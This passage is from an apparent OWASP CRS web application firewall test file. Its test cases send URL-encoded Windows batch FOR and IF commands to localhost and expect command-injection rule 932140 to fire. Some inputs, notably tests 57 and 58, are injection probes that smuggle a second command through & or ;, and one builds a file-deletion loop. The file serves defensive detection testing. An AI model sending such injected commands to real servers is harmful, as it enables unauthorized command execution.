headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?foo=For+%2FR+C%3A%5Ctemp%5C+%25G+IN+%28%2A.bak%29+do+Echo+del+%22%25G%22" + version: HTTP/1.0 + output: + log: + expect_ids: [932140] + - test_id: 35 + desc: imported test + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?foo=For+%2FR+C%3A%5Ctemp%5C+%25%25G+IN+%28%2A.bak%29+do+Echo+del+%22%25%25G%22" + version: HTTP/1.0 + output: + log: + expect_ids: [932140] + - test_id: 36 + desc: imported test + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?foo=FOR+%2Ff+%22tokens%3D%2A%22+%25G+IN+%28%27dir+%2Fb%27%29+DO+%28call+%3Asubroutine+%22%25G%22%29" + version: HTTP/1.0 + output: + log: + expect_ids: [932140] + - test_id: 37 + desc: imported test + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?foo=FOR+%2Ff+%22tokens%3D%2A%22+%25%25G+IN+%28%27dir+%2Fb%27%29+DO+%28call+%3Asubroutine+%22%25%25G%22%29" + version: HTTP/1.0 + output: + log: + expect_ids: [932140] + - test_id: 38 + desc: imported test + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + 
uri: "/get?foo=FOR+%2FF+%22tokens%3D1-5%22+%25A+IN+%28%22This+is+a+short+sentence%22%29+DO+%40echo+%25A+%25B+%25D" + version: HTTP/1.0 + output: + log: + expect_ids: [932140] + - test_id: 39 + desc: imported test + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?foo=FOR+%2FF+%22tokens%3D1-5%22+%25%25A+IN+%28%22This+is+a+short+sentence%22%29+DO+%40echo+%25%25A+%25%25B+%25%25D" + version: HTTP/1.0 + output: + log: + expect_ids: [932140] + - test_id: 40 + desc: imported test + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?foo=FOR+%25G+IN+%28a%2Cb%2Cc%2Cd%2Ce%2Cf%2Cg%2Ch%2Ci%2Cj%2Ck%2Cl%2Cm%2Cn%2Co%2Cp%2Cq%2Cr%2Cs%2Ct%2Cu%2Cv%2Cw%2Cx%2Cy%2Cz%29+DO+%28md+C%3A%5Cdemo%5C%25G%29" + version: HTTP/1.0 + output: + log: + expect_ids: [932140] + - test_id: 41 + desc: imported test + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?foo=FOR+%25%25G+IN+%28a%2Cb%2Cc%2Cd%2Ce%2Cf%2Cg%2Ch%2Ci%2Cj%2Ck%2Cl%2Cm%2Cn%2Co%2Cp%2Cq%2Cr%2Cs%2Ct%2Cu%2Cv%2Cw%2Cx%2Cy%2Cz%29+DO+%28md+C%3A%5Cdemo%5C%25%25G%29" + version: HTTP/1.0 + output: + log: + expect_ids: [932140] + - test_id: 42 + desc: imported test + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: 
"/get?foo=FOR+%2FL+%25G+IN+%281%2C1%2C5%29+DO+echo+%25G" + version: HTTP/1.0 + output: + log: + expect_ids: [932140] + - test_id: 43 + desc: imported test + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?foo=FOR+%2FL+%25%25G+IN+%281%2C1%2C5%29+DO+echo+%25%25G" + version: HTTP/1.0 + output: + log: + expect_ids: [932140] + - test_id: 44 + desc: imported test + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?foo=FOR+%25G+IN+%28Sun+Mon+Tue+Wed+Thur+Fri+Sat%29+DO+echo+%25G" + version: HTTP/1.0 + output: + log: + expect_ids: [932140] + - test_id: 45 + desc: imported test + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?foo=FOR+%25%25G+IN+%28Sun+Mon+Tue+Wed+Thur+Fri+Sat%29+DO+echo+%25%25G" + version: HTTP/1.0 + output: + log: + expect_ids: [932140] + - test_id: 46 + desc: imported test + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?foo=for+%2Ff+%22tokens%3D%2A%22+%25G+in+%28%27dir+%2Fb+%2Fs+%2Fa%3Ad+%22C%3A%5CWork%5Creports%2A%22%27%29+do+echo+Found+%25G" + version: HTTP/1.0 + output: + log: + expect_ids: [932140] + - test_id: 47 + desc: imported test + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Accept: 
"text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?foo=for+%2Ff+%22tokens%3D%2A%22+%25%25G+in+%28%27dir+%2Fb+%2Fs+%2Fa%3Ad+%22C%3A%5CWork%5Creports%2A%22%27%29+do+echo+Found+%25%25G" + version: HTTP/1.0 + output: + log: + expect_ids: [932140] + - test_id: 48 + desc: imported test + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?foo=FOR+%2FD+%2Fr+%25G+in+%28%22User%2A%22%29+DO+Echo+We+found+%25G" + version: HTTP/1.0 + output: + log: + expect_ids: [932140] + - test_id: 49 + desc: imported test + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?foo=FOR+%2FF+%22tokens%3D1%2C3+delims%3D%2C%22+%25%25G+IN+%28weather.txt%29+DO+%40echo+%25%25G+%25%25H" + version: HTTP/1.0 + output: + log: + expect_ids: [932140] + - test_id: 50 + desc: imported test + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?foo=FOR+%2FF+%22tokens%3D4+delims%3D%2C%22+%25%25G+IN+%28%22deposit%2C%244500%2C123.4%2C12-AUG-09%22%29+DO+%40echo+Date+paid+%25%25G" + version: HTTP/1.0 + output: + log: + expect_ids: [932140] + - test_id: 51 + desc: imported test + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + 
User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?foo=FOR+%2FF+%25G+IN+%28%27%22C%3A%5Cprogram+Files%5Ccommand.exe%22%27%29+DO+ECHO+%25G" + version: HTTP/1.0 + output: + log: + expect_ids: [932140] + - test_id: 52 + desc: imported test + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?foo=FOR+%2FF+%25%25G+IN+%28%27%22C%3A%5Cprogram+Files%5Ccommand.exe%22%27%29+DO+ECHO+%25%25G" + version: HTTP/1.0 + output: + log: + expect_ids: [932140] + - test_id: 53 + desc: imported test + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?foo=FOR+%2FF+%22tokens%3D1%2C2%2A+delims%3D%2C%22+%25%25+IN+%28C%3A%5CMyDocu%7E1%5Cmytex%7E1.txt%29+DO+ECHO+%25%25" + version: HTTP/1.0 + output: + log: + expect_ids: [932140] + - test_id: 54 + desc: imported test + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?foo=FOR+%2FF+%22tokens%3D1%2C2%2A+delims%3D%2C%22+%25%25G+IN+%28C%3A%5CMyDocu%7E1%5Cmytex%7E1.txt%29+DO+ECHO+%25%25G" + version: HTTP/1.0 + output: + log: + expect_ids: [932140] + - test_id: 55 + desc: imported test + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: 
"/get?foo=FOR+%2FF+%22usebackq+tokens%3D1%2C2%2A+delims%3D%2C%22+%25G+IN+%28%22C%3A%5CMy+Documents%5Cmy+textfile.txt%22%29+DO+ECHO+%25G" + version: HTTP/1.0 + output: + log: + expect_ids: [932140] + - test_id: 56 + desc: imported test + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?foo=FOR+%2FF+%22usebackq+tokens%3D1%2C2%2A+delims%3D%2C%22+%25%25G+IN+%28%22C%3A%5CMy+Documents%5Cmy+textfile.txt%22%29+DO+ECHO+%25%25G" + version: HTTP/1.0 + output: + log: + expect_ids: [932140] + - test_id: 57 + desc: imported test + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?foo=%26+for+%2Ff+%5C%22delims%3D%5C%22+%25i+in+%28%27cmd+%2Fc+%5C%22set+%2Fa+%2863%2B21%29%5C%22%27%29+do+%40set+%2Fp+%3D+PDVQIS%25iPDVQISPDVQIS%3C+nul" + version: HTTP/1.0 + output: + log: + expect_ids: [932140] + - test_id: 58 + desc: imported test + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?foo=%3Bfor+%2Ff+%5C%22delims%3D%5C%22+%25i+in+%28%27cmd+%2Fc+%5C%22set+%2Fa+%2835%2B66%29%5C%22%27%29+do+%40set+%2Fp+%3D+LZEUZE%25iLZEUZELZEUZE%3C+nul%27" + version: HTTP/1.0 + output: + log: + expect_ids: [932140] + - test_id: 59 + desc: imported test + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 
80 + uri: "/get?foo=for+%2Ff+%22tokens%3D%2A+delims%3D0%22+%25%25A+in+%28%22%25n1%25%22%29+do+set+%22n1%3D%25%25A%22" + version: HTTP/1.0 + output: + log: + expect_ids: [932140] + - test_id: 60 + desc: imported test + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?foo=for+%25i+in+%28%2A%29+do+set+LIST%3D+%25i" + version: HTTP/1.0 + output: + log: + expect_ids: [932140] + - test_id: 61 + desc: imported test + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?foo=for+%25i+in+%28%2A%29+do+set+LIST%3D%21LIST%21+%25i" + version: HTTP/1.0 + output: + log: + expect_ids: [932140] + - test_id: 62 + desc: imported test + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?foo=for+%2Fl+%25%25I+in+%280%2C1%2C5%29+do+call+echo+%25%25RANDOM%25%25" + version: HTTP/1.0 + output: + log: + expect_ids: [932140] + - test_id: 63 + desc: imported test + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?foo=for+%25%25d+in+%28A%2CC%2CD%29+do+DIR+%25%25d+%2A.%2A" + version: HTTP/1.0 + output: + log: + expect_ids: [932140] + - test_id: 64 + desc: imported test + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Accept: 
"text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?foo=for+%25%25f+in+%28%2A.TXT+%2A.BAT+%2A.DOC%29+do+TYPE+%25%25f" + version: HTTP/1.0 + output: + log: + expect_ids: [932140] + - test_id: 65 + desc: imported test + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?foo=for+%25%25P+in+%28%25PATH%25%29+do+if+exist+%25%25P%5C%2A.BAT+COPY+%25%25P%5C%2A.BAT+C%3A%5CBAT" + version: HTTP/1.0 + output: + log: + expect_ids: [932140] + - test_id: 66 + desc: imported test + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?foo=IF++++++++EXIST+filename.txt+++++%28" + version: HTTP/1.0 + output: + log: + expect_ids: [932140] + - test_id: 67 + desc: imported test + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?foo=IF++++++++EXIST+filename+++++++++CMD" + version: HTTP/1.0 + output: + log: + expect_ids: [932140] + - test_id: 68 + desc: imported test + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?foo=IF++++++++EXIST+filename+++++++++%28CMD%29" + version: HTTP/1.0 + output: + log: + expect_ids: [932140] + - test_id: 
69 + desc: imported test + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?foo=IF++++++++EXIST+data.xls+++++++++Echo+The+file+was+found." + version: HTTP/1.0 + output: + log: + expect_ids: [932140] + - test_id: 70 + desc: imported test + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?foo=IF++++++++EXIST+MyFile.txt+++++++%28ECHO+Some%5Bmore%5DPotatoes%29" + version: HTTP/1.0 + output: + log: + expect_ids: [932140] + - test_id: 71 + desc: imported test + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?foo=IF++++++++EXIST+C%3A%5Cpagefile.sys++CMD" + version: HTTP/1.0 + output: + log: + expect_ids: [932140] + - test_id: 72 + desc: imported test + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?foo=IF++++++++EXIST+C%3A%5Cpagefile.sys++%28CMD%29+ELSE+%28CMD%29" + version: HTTP/1.0 + output: + log: + expect_ids: [932140] + - test_id: 73 + desc: imported test + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: 
"/get?foo=IF++++NOT+EXIST+C%3A%5Cnonexistent+++CMD" + version: HTTP/1.0 + output: + log: + expect_ids: [932140] + - test_id: 74 + desc: imported test + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?foo=IF+%2FI+NOT+EXIST+C%3A%5Cnonexistent+++echo+hey" + version: HTTP/1.0 + output: + log: + expect_ids: [932140] + - test_id: 75 + desc: imported test + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?foo=IF+++%2FI+++NOT+++EXIST+++C%3A%5Cnonexistent+++echo+hey" + version: HTTP/1.0 + output: + log: + expect_ids: [932140] + - test_id: 76 + desc: imported test + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?foo=IF++++NOT+EXIST+C%3A%5Cnonexistent+++%28CMD%29+ELSE+%28CMD%29" + version: HTTP/1.0 + output: + log: + expect_ids: [932140] + - test_id: 77 + desc: imported test + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?foo=IF++++NOT+EXIST+%28C%3A%5Cnonexistent%29+ECHO+pwnt" + version: HTTP/1.0 + output: + log: + expect_ids: [932140] + - test_id: 78 + desc: imported test + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: 
localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?foo=IF++++++++DEFINED+variable+++++++CMD" + version: HTTP/1.0 + output: + log: + expect_ids: [932140] + - test_id: 79 + desc: imported test + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?foo=IF++++NOT+DEFINED+_example+++++++ECHO+Value+Missing" + version: HTTP/1.0 + output: + log: + expect_ids: [932140] + - test_id: 80 + desc: imported test + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?foo=IF++++++++ERRORLEVEL+0+++++++++++CMD" + version: HTTP/1.0 + output: + log: + expect_ids: [932140] + - test_id: 81 + desc: imported test + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?foo=IF++++NOT+ERRORLEVEL+0+++++++++++CMD" + version: HTTP/1.0 + output: + log: + expect_ids: [932140] + - test_id: 82 + desc: imported test + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?foo=IF++++++++CMDEXTVERSION+1++++++++GOTO+start_process" + version: HTTP/1.0 + output: + log: + expect_ids: [932140] + - test_id: 83 + desc: imported test + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Accept: 
"text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?foo=IF++++++++2++++++++++++GEQ+15++++echo+%22bigger%22" + version: HTTP/1.0 + output: + log: + expect_ids: [932140] + - test_id: 84 + desc: imported test + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?foo=IF++++++++%222%22++++++++++GEQ+%2215%22++echo+%22bigger%22" + version: HTTP/1.0 + output: + log: + expect_ids: [932140] + - test_id: 85 + desc: imported test + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?foo=IF++++++++%25ERRORLEVEL%25+EQU+2+++++goto+sub_problem2" + version: HTTP/1.0 + output: + log: + expect_ids: [932140] + - test_id: 86 + desc: imported test + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?foo=IF++++++++%25ERRORLEVEL%25+NEQ+0+++++echo+test" + version: HTTP/1.0 + output: + log: + expect_ids: [932140] + - test_id: 87 + desc: imported test + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?foo=IF++++++++%25ERRORLEVEL%25+LEQ+2+++++echo+test" + version: HTTP/1.0 + output: + log: + expect_ids: [932140] + - test_id: 88 + desc: 
imported test + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?foo=IF++++++++%25ERRORLEVEL%25+GTR+2+++++echo+test" + version: HTTP/1.0 + output: + log: + expect_ids: [932140] + - test_id: 89 + desc: imported test + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?foo=IF++++++++%25ERRORLEVEL%25+GEQ+2+++++echo+test" + version: HTTP/1.0 + output: + log: + expect_ids: [932140] + - test_id: 90 + desc: imported test + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?foo=IF++++++++%25VARIABLE%25+++GTR+0+++++Echo+An+error+was+found" + version: HTTP/1.0 + output: + log: + expect_ids: [932140] + - test_id: 91 + desc: imported test + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?foo=IF++++++++%25VARIABLE%25+++LSS+0+++++Echo+An+error+was+found" + version: HTTP/1.0 + output: + log: + expect_ids: [932140] + - test_id: 92 + desc: imported test + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: 
"/get?foo=IF++++++++%25VARIABLE%25+++EQU+0+++++Echo+An+error+was+found" + version: HTTP/1.0 + output: + log: + expect_ids: [932140] + - test_id: 93 + desc: imported test + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?foo=IF+%2FI+++++item1%3D%3Ditem2+++++++++++CMD" + version: HTTP/1.0 + output: + log: + expect_ids: [932140] + - test_id: 94 + desc: imported test + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?foo=IF+%2FI+NOT+item1%3D%3Ditem2+++++++++++CMD" + version: HTTP/1.0 + output: + log: + expect_ids: [932140] + - test_id: 95 + desc: imported test + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?foo=IF+%2FI+NOT+1%3D%3D2+++++++++++++++++++CMD" + version: HTTP/1.0 + output: + log: + expect_ids: [932140] + - test_id: 96 + desc: imported test + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?foo=IF++++++++%25_prefix%25%3D%3DSS6+++++++++GOTO+they_matched" + version: HTTP/1.0 + output: + log: + expect_ids: 